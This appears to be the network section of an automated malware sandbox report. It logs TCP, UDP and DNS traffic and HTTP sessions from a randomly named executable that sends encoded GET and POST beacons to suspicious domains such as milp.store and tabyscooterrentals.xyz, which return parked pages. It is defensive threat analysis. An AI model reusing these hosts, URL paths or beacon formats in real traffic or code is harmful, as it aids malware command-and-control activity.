Jan 8, 2025 12:49:37.048599005 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:37.048651934 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048665047 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048675060 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048687935 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048707008 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:37.048732996 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:37.048747063 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:37.934328079 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:38.953145027 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:38.957915068 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:38.958024025 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:38.973654032 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:38.978538036 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622344971 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622373104 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622390032 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622473955 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:39.622484922 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622498989 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622510910 CET	80	57577	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:39.622543097 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:39.622564077 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:40.481245041 CET	57577	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:41.500533104 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:41.505494118 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:41.505599022 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:41.520450115 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:41.525310040 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:41.525460958 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194371939 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194402933 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194415092 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194444895 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194456100 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194469929 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194475889 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:42.194497108 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194509983 CET	80	57578	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:42.194515944 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:42.194557905 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:43.040026903 CET	57578	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.046999931 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.051868916 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.051966906 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.061306953 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.066795111 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826718092 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826744080 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826756001 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826767921 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826781034 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826797009 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826817989 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:44.826925993 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.826961994 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.831502914 CET	57579	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:44.836263895 CET	80	57579	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:57.936389923 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:49:57.941137075 CET	80	57580	172.67.131.144	192.168.2.5
Jan 8, 2025 12:49:57.941215992 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:49:57.956706047 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:49:57.961471081 CET	80	57580	172.67.131.144	192.168.2.5
Jan 8, 2025 12:49:58.580373049 CET	80	57580	172.67.131.144	192.168.2.5
Jan 8, 2025 12:49:58.580387115 CET	80	57580	172.67.131.144	192.168.2.5
Jan 8, 2025 12:49:58.580507040 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:49:58.580568075 CET	80	57580	172.67.131.144	192.168.2.5
Jan 8, 2025 12:49:58.580667019 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:49:59.465610027 CET	57580	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:00.492856026 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:00.497776031 CET	80	57581	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:00.497864008 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:00.521461964 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:00.526297092 CET	80	57581	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:01.123605013 CET	80	57581	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:01.123613119 CET	80	57581	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:01.123702049 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:01.123959064 CET	80	57581	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:01.124010086 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:02.028064013 CET	57581	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:03.046928883 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:03.051774979 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.051870108 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:03.067827940 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:03.073031902 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.073189020 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.679008007 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.679028034 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.679075003 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:03.679649115 CET	80	57582	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:03.679692984 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:04.575052977 CET	57582	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:05.593446970 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:05.598364115 CET	80	57583	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:05.601763964 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:05.611571074 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:05.616329908 CET	80	57583	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:06.236671925 CET	80	57583	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:06.236690044 CET	80	57583	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:06.236875057 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:06.237215042 CET	80	57583	172.67.131.144	192.168.2.5
Jan 8, 2025 12:50:06.237263918 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:06.482837915 CET	57583	80	192.168.2.5	172.67.131.144
Jan 8, 2025 12:50:06.487658024 CET	80	57583	172.67.131.144	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:48:21.003706932 CET	53	64773	1.1.1.1	192.168.2.5
Jan 8, 2025 12:49:11.524874926 CET	55515	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:11.620224953 CET	53	55515	1.1.1.1	192.168.2.5
Jan 8, 2025 12:49:27.823527098 CET	56258	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:28.216882944 CET	53	56258	1.1.1.1	192.168.2.5
Jan 8, 2025 12:49:36.329041004 CET	62773	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:36.395924091 CET	53	62773	1.1.1.1	192.168.2.5
Jan 8, 2025 12:49:49.844484091 CET	55730	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:49.855916977 CET	53	55730	1.1.1.1	192.168.2.5
Jan 8, 2025 12:49:57.922485113 CET	65246	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:57.933870077 CET	53	65246	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 12:49:11.524874926 CET	192.168.2.5	1.1.1.1	0x7941	Standard query (0)	www.tabyscooterrentals.xyz	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:27.823527098 CET	192.168.2.5	1.1.1.1	0x2828	Standard query (0)	www.ftaane.net	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:36.329041004 CET	192.168.2.5	1.1.1.1	0xa939	Standard query (0)	www.milp.store	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:49.844484091 CET	192.168.2.5	1.1.1.1	0x7784	Standard query (0)	www.vavada-official.buzz	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:57.922485113 CET	192.168.2.5	1.1.1.1	0x4c12	Standard query (0)	www.jyshe18.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 12:49:11.620224953 CET	1.1.1.1	192.168.2.5	0x7941	No error (0)	www.tabyscooterrentals.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 12:49:11.620224953 CET	1.1.1.1	192.168.2.5	0x7941	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 12:49:11.620224953 CET	1.1.1.1	192.168.2.5	0x7941	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:28.216882944 CET	1.1.1.1	192.168.2.5	0x2828	Name error (3)	www.ftaane.net	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:36.395924091 CET	1.1.1.1	192.168.2.5	0xa939	No error (0)	www.milp.store		194.9.94.85	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:36.395924091 CET	1.1.1.1	192.168.2.5	0xa939	No error (0)	www.milp.store		194.9.94.86	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:49.855916977 CET	1.1.1.1	192.168.2.5	0x7784	Name error (3)	www.vavada-official.buzz	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:57.933870077 CET	1.1.1.1	192.168.2.5	0x4c12	No error (0)	www.jyshe18.buzz		172.67.131.144	A (IP address)	IN (0x0001)	false
Jan 8, 2025 12:49:57.933870077 CET	1.1.1.1	192.168.2.5	0x4c12	No error (0)	www.jyshe18.buzz		104.21.4.23	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.tabyscooterrentals.xyz

www.milp.store

www.jyshe18.buzz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	57575	85.159.66.93	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:11.642894983 CET	407	OUT	GET /4wxo/?9DQxz=BXUp_jixat&oVUxTLO=AuCk/wTI7zW3ld/vlF6yH/SnOpsg3Nt9prPfFK+Yc5xTqeXBXJi84rnX4QtnNLSqr4pLPSODfOM24Q7oPb8npNZet2wbij5DqF2t6l2aiyaCaN+prATVQbgFOC5sVP+ADg== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.tabyscooterrentals.xyz User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
Jan 8, 2025 12:49:12.400077105 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Wed, 08 Jan 2025 11:49:12 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2025-01-08T11:49:17.2881051Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	57576	194.9.94.85	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:36.427891016 CET	647	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 208 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 75 64 75 53 32 53 74 2f 4a 6b 4e 6e 30 59 49 61 75 6c 58 2f 4f 36 4a 4a 32 2f 38 6a 69 73 4b 37 6c 7a 66 37 56 67 49 3d Data Ascii: oVUxTLO=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBuduS2St/JkNn0YIaulX/O6JJ2/8jisK7lzf7VgI=
Jan 8, 2025 12:49:37.048471928 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 11:49:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 8, 2025 12:49:37.048495054 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 8, 2025 12:49:37.048505068 CET	448	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jan 8, 2025 12:49:37.048651934 CET	1236	IN	Data Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20 Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
Jan 8, 2025 12:49:37.048665047 CET	1236	IN	Data Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
Jan 8, 2025 12:49:37.048675060 CET	430	IN	Data Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	57577	194.9.94.85	80	3964	C:\Program Files (x86)\rHTDvBUuVfURuVEnPOQWQAQoEeMyoeyFovurhbmKPdzcxzVmGEEyKJYbvqGGAWqbjMdeAUZdjVNhfiWg\ycnUEzgloE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 12:49:38.973654032 CET	667	OUT	POST /2j93/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 228 Connection: close Host: www.milp.store Origin: http://www.milp.store Referer: http://www.milp.store/2j93/ User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1) Data Raw: 6f 56 55 78 54 4c 4f 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 6c 78 6d 73 30 55 7a 63 72 53 2f 51 50 4c 4c 33 66 69 50 79 57 52 66 39 62 30 55 47 77 61 4f 6d 39 51 43 66 65 66 Data Ascii: oVUxTLO=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXdalxms0UzcrS/QPLL3fiPyWRf9b0UGwaOm9QCfef
Jan 8, 2025 12:49:39.622344971 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 08 Jan 2025 11:49:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.30 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jan 8, 2025 12:49:39.622373104 CET	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jan 8, 2025 12:49:39.622390032 CET	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
